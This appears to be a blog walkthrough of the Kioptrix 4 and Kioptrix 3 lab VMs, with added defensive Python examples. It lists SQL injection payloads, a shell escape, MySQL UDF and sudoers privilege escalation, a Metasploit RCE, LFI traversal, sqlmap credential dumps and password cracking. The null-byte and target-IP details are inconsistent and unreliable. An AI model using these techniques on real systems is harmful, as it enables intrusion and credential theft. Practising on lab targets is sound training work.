Saturday, March 30, 2019

Kioptrix4

netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
enum4linux -a 192.168.0.4 | tee e4l.txt
nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing from the dirb results that a john directory existed, I opened john/john.php directly in the browser.

To check manually whether the web site was vulnerable to SQL injection, I simply added a single quote (') to the Username and Password fields and clicked the Login button.
Interestingly, this revealed that a MySQL database was in use and that the page checklogin.php handled the login.
Next, I used the discovered SMB usernames together with one of the following SQL injection payloads in the Password field:
blah' OR 1=1 -- -
' OR '1'='1
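Why the single-quote probe leaks a database error and why the payloads above log in as the first user: the example below is added here and is not code from the original post or from the Kioptrix VM. It models a checklogin.php-style login in two versions on a constructed in-memory SQLite table; the table name `members`, the column names and the placeholder accounts are assumptions, and the parameterised version is the fix.

```python
import sqlite3

# Added example: a miniature login check in two versions, using an in-memory
# SQLite table constructed here to stand in for the MySQL table behind
# checklogin.php. Table, column and account names are assumptions.

def make_db():
    """Build the constructed sample table with two placeholder accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [("john", "placeholder-pw-1"), ("robert", "placeholder-pw-2")],
    )
    return conn

def login_vulnerable(username, password):
    """String-concatenated query: whatever the user types becomes SQL text.
    Returns the username the database believes logged in, or None."""
    conn = make_db()
    sql = ("SELECT username FROM members "
           "WHERE username='%s' AND password='%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(username, password):
    """Parameterised query: the driver binds the values, so quotes,
    OR clauses and comment markers stay inert data."""
    conn = make_db()
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def probe_causes_syntax_error(username, password):
    """The manual test from the walkthrough: a lone quote in a field.
    In the concatenated version it produces a database syntax error (what a
    careless login page then shows as a MySQL error); in the safe version it
    is simply a failed login."""
    try:
        login_vulnerable(username, password)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    attempts = [("john", "placeholder-pw-1"),
                ("john", "' OR '1'='1"),
                ("blah' OR 1=1 -- -", "x")]
    for user, pw in attempts:
        print(repr((user, pw)), "vulnerable:", login_vulnerable(user, pw),
              "safe:", login_safe(user, pw))
    print("probe error leaked:", probe_causes_syntax_error("'", "x"))
```

The concatenated query turns `' OR '1'='1` into `WHERE username='john' AND password='' OR '1'='1'`, which is true for every row, so the first row in the table wins regardless of the username supplied. The bound-parameter version compares the literal string and finds nothing; the fix is the parameterisation, not filtering quotes.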
 
ssh john@192.168.0.3
The john account only had a limited (restricted) shell.
 
Knowing that Python is usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:
python
exit_code = os.system('/bin/sh')
output = os.popen('/bin/sh').read()
After some time, I found that issuing the echo command with Python's os.system call spawned /bin/bash:
echo os.system('/bin/bash');
I then tried sudo su,
but with no luck.
cat /var/www/checklogin.php
This revealed that the MySQL root password was empty.
I then checked whether MySQL was running as root or under a different credential:
ps -ef | grep mysql
It was running as root.
MySQL supports UDFs (User-Defined Functions), so I issued the locate udf command to see whether a UDF library was installed on the system.


mysql -u root
select * from mysql.func;
select sys_exec('usermod -a -G admin john');
exit
sudo su
boom... you have root!!
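The two conditions that made this route work are a MySQL server running as root and a command-execution UDF registered in mysql.func. The checks below are an added example, not part of the original post; the ps output and the mysql.func rows are constructed sample data, not anything captured from the VM, and the set of UDF names treated as command-execution capable is an assumption based on the sys_exec call above.

```python
import posixpath

# Added example: two defender-side checks for the conditions behind the UDF
# escalation. All input here is constructed sample data.

# Constructed `ps -ef` output (not captured from the VM).
PS_SAMPLE = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 09:00 ?        00:00:01 /sbin/init
root      1742     1  0 09:01 ?        00:00:03 /usr/sbin/mysqld --datadir=/var/lib/mysql
mysql     1790     1  0 09:01 ?        00:00:02 /usr/sbin/mysqld --socket=/tmp/other.sock
john      2101  2099  0 09:10 pts/0    00:00:00 grep mysql
"""

# Constructed rows as `SELECT name, ret, dl, type FROM mysql.func;` would return them.
FUNC_SAMPLE = [
    ("sys_exec", 2, "lib_mysqludf_sys.so", "function"),
    ("sys_eval", 0, "lib_mysqludf_sys.so", "function"),
    ("my_checksum", 0, "lib_checksum.so", "function"),
]

# UDF names treated as able to run shell commands (assumption: the sys_* family).
SHELL_UDF_NAMES = {"sys_exec", "sys_eval"}

def mysqld_running_as_root(ps_output):
    """Return the PIDs of mysqld processes whose UID column is root.
    Matches the binary name, so an unrelated 'grep mysql' is not counted."""
    pids = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        cols = line.split(None, 7)                   # UID PID PPID C STIME TTY TIME CMD
        if len(cols) < 8:
            continue
        uid, pid, cmd = cols[0], cols[1], cols[7]
        binary = posixpath.basename(cmd.split()[0])
        if uid == "root" and binary == "mysqld":
            pids.append(int(pid))
    return pids

def registered_udfs(func_rows):
    """Return (name, library, severity) for every UDF in mysql.func.
    Any registered UDF deserves review; command-execution ones are high."""
    findings = []
    for name, _ret, dl, _type in func_rows:
        severity = "high" if name in SHELL_UDF_NAMES else "review"
        findings.append((name, dl, severity))
    return findings

if __name__ == "__main__":
    print("mysqld as root, PIDs:", mysqld_running_as_root(PS_SAMPLE))
    for finding in registered_udfs(FUNC_SAMPLE):
        print("UDF:", finding)
```

On a real host, feed `ps -ef` output and the result of the mysql.func query into these functions. The fixes are the usual ones: run mysqld under a dedicated unprivileged account, never leave the MySQL root account with an empty password, keep the plugin directory unwritable by the database user, and treat any unexpected row in mysql.func as an incident to investigate.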

Finally, read the flag: cat /root/congrats.txts

Sunday, March 10, 2019

kioptrix3

netdiscover -r 192.168.0.0/24

nmap -sS -T4 -oA nmap_kioptrix3 192.168.0.3

nikto -host 192.168.0.3 -port 80 -output nikto.html

searchsploit -w lotuscms

We found a remote code execution exploit, which can be run using msf, netcat, or directly.

msfconsole
search lotuscms

use exploit/multi/http/lcms_php_exec

RHOST = IP address of the kioptrix3 VM
RPORT = 80
URI = / (as found by nmap and nikto)
LPORT = local port on the Kali system that the RHOST connects back to

run
You will get a console and can open the passwd file, but not the shadow file.

I then tried to access the users' home directories.
The /home/dreg directory contained nothing interesting. However, /home/loneferret turned up some interesting information:
a CompanyPolicy.README file showing that loneferret can run sudo ht.

Further inspection of /home/www/kioptrix3.com/gallery/gconfig.php showed hard-coded root credentials for the gallery database, i.e. fucyeyou.

Next, I launched a browser and returned to the Kioptrix system's phpMyAdmin page (http://192.168.0.3/phpmyadmin).

Exploring the database application, we found three databases:

gallery
information_schema
mysql

The gallery database contains a table called dev_accounts, in which we found usernames and hashed passwords.

Seeing that the local website used PHP, I tried to determine whether the PHP scripts sanitized their input. I added ../../../../../etc/passwd directly after the = sign in the URL.

Unfortunately, I did not receive any results, so I turned to the Internet to research PHP LFI vulnerabilities. The OWASP "Testing for Local File Inclusion" guide notes that a null-byte terminator may be needed to signify the end of the string.
So I re-entered ../../../../../etc/passwd and appended jpg to the end of the string, as the OWASP article suggested.

http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml
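What happens to the include path in the two attempts above (with and without the null byte), and what a hardened resolver looks like: the example below is added here and is not the site's PHP or code from the original post. It models an include of a page parameter (the `system` parameter in the URL) as a string transformation only; no files are opened. `WEB_ROOT`, the `.html` suffix and the page names are assumptions.

```python
import posixpath
import re

# Added example: how a page-parameter include resolves, in a legacy-vulnerable
# form and a hardened form. Paths are computed, never opened. WEB_ROOT is an
# assumed directory, not the VM's real document root.

WEB_ROOT = "/var/www/kioptrix3.com"   # assumption
PAGE_SUFFIX = ".html"

def resolve_legacy(page):
    """Models include(WEB_ROOT . '/' . $page . '.html') on an old PHP build
    where the filename was a C string, so a NUL byte truncated it. This is the
    null-byte technique the OWASP guide describes."""
    candidate = WEB_ROOT + "/" + page + PAGE_SUFFIX
    candidate = candidate.split("\x00", 1)[0]   # legacy truncation at NUL
    return posixpath.normpath(candidate)

# Allowlist for the page name: letters, digits, underscore, dash. No '.', '/' or NUL.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def resolve_hardened(page):
    """Allowlist the page name, then confirm the normalised path still lies
    under WEB_ROOT (defence in depth). Returns None when rejected."""
    if not SAFE_NAME.match(page):
        return None
    candidate = posixpath.normpath(WEB_ROOT + "/" + page + PAGE_SUFFIX)
    if not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

if __name__ == "__main__":
    for p in ["home", "../../../../../etc/passwd", "../../../../../etc/passwd\x00"]:
        print(repr(p), "legacy:", resolve_legacy(p), "hardened:", resolve_hardened(p))
```

Without the null byte the legacy resolver lands on `/etc/passwd.html`, which does not exist, which is exactly why the first attempt returned nothing; with it, the suffix is cut off. The hardened version does not try to strip `../` sequences, which is fragile; it rejects anything that is not a plain page name and re-checks the normalised result against the document root.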

The attacking system's /etc/hosts file must contain an entry for kioptrix3.com; otherwise, references to kioptrix3.com will try to resolve via the Internet and the image files may not display correctly.

sqlmap -u http://192.168.0.3/gallery/index.php
sqlmap -u http://192.168.0.3/gallery/recent.php
sqlmap -u http://192.168.0.3/gallery/g.php/1

The above commands did not give sufficient results, so I tried further.

Using the commands below we found the usernames and password hashes (the URL is quoted so the shell does not interpret the & and # characters, and the table is dev_accounts):

sqlmap -u 'http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid' --dbs
sqlmap -u 'http://192.168.0.3/gallery/gallery.php?id=1' -D gallery --tables
sqlmap -u 'http://192.168.0.3/gallery/gallery.php?id=1' -D gallery -T dev_accounts --dump
sqlmap -u 'http://192.168.0.3/gallery/gallery.php?id=1' -D mysql -T user --dump
sqlmap -u 'http://192.168.0.3/gallery/gallery.php?id=1' -D mysql -T user --dump -C 'host,user,password'
  

Having the usernames from /etc/passwd and now the usernames and hashes from phpMyAdmin, I had enough information to use a password cracker to recover the credentials. I decided to use Hydra and Hashcat.

Method 1:

I created a text file named users containing the loneferret and dreg usernames. I then launched Hydra to brute force the Kioptrix system with the following parameters:
· -L = login (username) file
· -P = password file
· ssh = service to attack
· -e nsr = n: try a null password, s: try the login as the password, r: try the reversed login
· -f = exit after a login/password pair is found
· -t 4 = number of parallel connection tasks

hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4

Method 2 (the dev_accounts hashes; -m 0 selects MD5):

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force

ssh loneferret@192.168.0.3 (password: starwars)
sudo -l



Unfortunately, I ran into an error opening the terminal with xterm-256color. After some research I found that running export TERM=xterm bypasses the xterm-256color error.
sudo ht

Open /etc/sudoers in ht and carefully edit the sudoers file:

add ,/bin/sh directly after /usr/local/bin/ht (separated from it by the comma)

save and exit

Then use:
sudo /bin/sh

You have root access!!
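The lesson for whoever maintains the box is that a sudo rule for an editor is a sudo rule for root, because the editor can rewrite /etc/sudoers itself. The auditor below is an added example and not part of the original post; it parses sudoers user specifications and flags commands that open an editor or a shell, NOPASSWD on such entries, and negated (!) entries, which the sudoers manual itself warns are not an effective restriction. The sample lines are constructed, not the VM's real /etc/sudoers, and the editor and shell name sets are assumptions.

```python
import posixpath
import re

# Added example: a small sudoers auditor. The sample below is constructed and
# is not the VM's real /etc/sudoers.
SUDOERS_SAMPLE = """\
# constructed sample sudoers
Defaults env_reset
root        ALL=(ALL) ALL
loneferret  ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg        ALL=(ALL) /bin/cat /var/log/syslog
"""

# Assumed sets: binaries that can edit arbitrary files or hand out a shell.
EDITORS = {"ht", "vi", "vim", "nano"}
SHELLS = {"sh", "bash", "dash"}

# user  host=(runas) [TAG: ...] cmd, cmd
SPEC = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG = re.compile(r"^(?:[A-Z]+:\s*)+")

def audit_sudoers(text):
    """Return (user, command, reason, nopasswd) findings for risky entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        user, _hosts, _runas, rest = m.groups()
        tags = TAG.match(rest)
        nopasswd = bool(tags and "NOPASSWD:" in tags.group(0))
        commands = [c.strip() for c in TAG.sub("", rest).split(",") if c.strip()]
        for cmd in commands:
            if cmd.startswith("!"):
                # sudoers(5): excluding commands with '!' is easy to circumvent
                findings.append((user, cmd, "negation", nopasswd))
                continue
            if cmd == "ALL":
                if user != "root":
                    findings.append((user, cmd, "unrestricted", nopasswd))
                continue
            binary = posixpath.basename(cmd.split()[0])
            if binary in EDITORS:
                findings.append((user, cmd, "editor", nopasswd))
            elif binary in SHELLS:
                findings.append((user, cmd, "shell", nopasswd))
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS_SAMPLE):
        print(finding)
```

Run it over `sudo cat /etc/sudoers` plus the files under /etc/sudoers.d; an "editor" finding with nopasswd set is the exact condition used above. The fix is to grant a specific, non-interactive command (or use sudoedit on a named file) rather than an editor binary, and never to rely on `!` exclusions.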